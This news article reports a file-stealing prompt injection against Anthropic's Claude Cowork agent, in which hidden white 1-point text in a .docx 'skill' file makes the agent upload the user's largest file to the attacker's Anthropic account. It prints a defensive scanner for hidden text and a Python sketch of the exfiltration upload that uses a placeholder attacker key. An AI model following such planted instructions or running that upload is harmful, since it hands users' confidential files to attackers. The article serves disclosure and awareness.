Claude Cowork hit with file-stealing prompt injection days after Anthropic launched it
Key Points
- Security researchers have documented a critical vulnerability in Anthropic's new AI system, Claude Cowork, shortly after its release.
- The flaw allows attackers to steal confidential user files without any human authorization. The attack relies on hidden prompt injections embedded in documents that appear harmless.
- Because the instructions are invisible to the user, the AI can be tricked into accessing and exposing private data while the user believes they are working with a safe file.
Just days after Anthropic unveiled Claude Cowork, security researchers documented a critical vulnerability that lets attackers steal confidential user files through hidden prompt injections, a long-standing weakness of AI systems.
Anthropic's new agentic AI system Claude Cowork is vulnerable to file exfiltration through indirect prompt injection, according to security researchers at PromptArmor. They documented the flaw just two days after the Research Preview went live.
The vulnerability stems from an isolation flaw in Claude's code execution environment that was already known before Cowork existed. According to PromptArmor, security researcher Johann Rehberger had previously identified and disclosed the issue in Claude.ai chat. Anthropic acknowledged the problem but allegedly never fixed it.
Malicious commands hide in plain sight
The attack chain PromptArmor documented starts when a user connects Cowork to a local folder containing confidential data. The attacker then plants a file containing a hidden prompt injection in that folder.
The technique is particularly sneaky: attackers can hide the injection in a .docx file disguised as a harmless "skill" document, a new prompt format for agentic AI systems that Anthropic only recently introduced. Skill files are already being shared online, so users should be cautious about downloading them from untrusted sources.
The malicious text uses 1-point font, white color on a white background, and 0.1 line spacing, making it virtually invisible to human eyes.
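
To get a sense of how this kind of formatting could be spotted, here is a minimal sketch that scans a .docx for text runs styled to be unreadable. It assumes the third-party python-docx package; the 1-point and white-on-white thresholds simply mirror the formatting PromptArmor describes, and the filename is illustrative.

```python
# Sketch: flag near-invisible text runs in a .docx (body paragraphs only;
# tables, headers, and footers are not checked in this minimal version).
from docx import Document
from docx.shared import Pt, RGBColor

WHITE = RGBColor(0xFF, 0xFF, 0xFF)

def suspicious_runs(path: str):
    """Yield text from runs whose formatting makes them effectively unreadable."""
    for paragraph in Document(path).paragraphs:
        for run in paragraph.runs:
            tiny = run.font.size is not None and run.font.size <= Pt(1)
            white_on_white = run.font.color.rgb == WHITE
            if (tiny or white_on_white) and run.text.strip():
                yield run.text

if __name__ == "__main__":
    # "integration_guide.docx" is a placeholder name for the planted file.
    for text in suspicious_runs("integration_guide.docx"):
        print("Hidden text:", text[:80])
```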

When the user asks Cowork to analyze their files using the uploaded "skill," the injection takes over. It tells Claude to run a curl command that sends the largest available file to Anthropic's File Upload API using the attacker's API key. The file lands in the attacker's Anthropic account, where they can access it at will. No human authorization is needed at any point.
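
Stripped of its hidden wrapper, the injected instruction amounts to a routine upload against Anthropic's Files API, roughly like the sketch below (written with Python's requests library rather than curl). The endpoint and headers follow Anthropic's published Files API documentation; the API key and filename are placeholders standing in for attacker-controlled values.

```python
import requests

ATTACKER_KEY = "sk-ant-..."  # placeholder: an API key the attacker controls

# Placeholder filename; in the documented attack, Claude is told to pick
# the largest file available in the connected folder.
with open("customer_export.csv", "rb") as f:
    resp = requests.post(
        "https://api.anthropic.com/v1/files",
        headers={
            "x-api-key": ATTACKER_KEY,
            "anthropic-version": "2023-06-01",
            "anthropic-beta": "files-api-2025-04-14",
        },
        files={"file": f},
    )

# The request targets api.anthropic.com, a domain the sandbox already trusts,
# so it passes the network allowlist even though the upload lands in the
# attacker's account.
print(resp.status_code, resp.json().get("id"))
```

The point of the sketch is that the sandbox's allowlist only checks the destination domain, while the API key inside the request decides which account ultimately receives the file.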

PromptArmor first ran the demonstration against Claude Haiku, Anthropic's weakest model. But even Claude Opus 4.5, the company's most capable model, fell for the manipulation. In one test, a user uploaded a malicious integration guide while developing an AI tool; customer data was exfiltrated through the whitelisted Anthropic API domain, bypassing the sandbox restrictions of the virtual machine running the code.
The researchers also found a potential denial-of-service bug: when Claude tries to read a file whose extension doesn't match its actual content, the API throws repeated errors in every subsequent turn of that conversation.
Anthropic had touted that Cowork was built in just a week and a half, written entirely by Claude Code, the AI coding tool that Cowork itself is built on. These newly discovered security flaws raise questions about whether security got enough attention during that rapid development.
Prompt injection remains an unsolved problem
Prompt injection attacks have plagued the AI industry for years. Despite ongoing efforts, no one has managed to prevent them or even significantly limit their impact. Even Anthropic's "most secure" model, Opus 4.5, remains highly vulnerable.
A tool like Cowork, which connects to your computer and numerous other data sources, creates many potential entry points. And unlike phishing attacks, which users can learn to spot, these exploits leave ordinary people with no practical way to defend themselves.
The case also highlights a fundamental tension in agentic AI systems: the more autonomy they have, the larger their attack surface becomes. Previous research has already shown this pattern.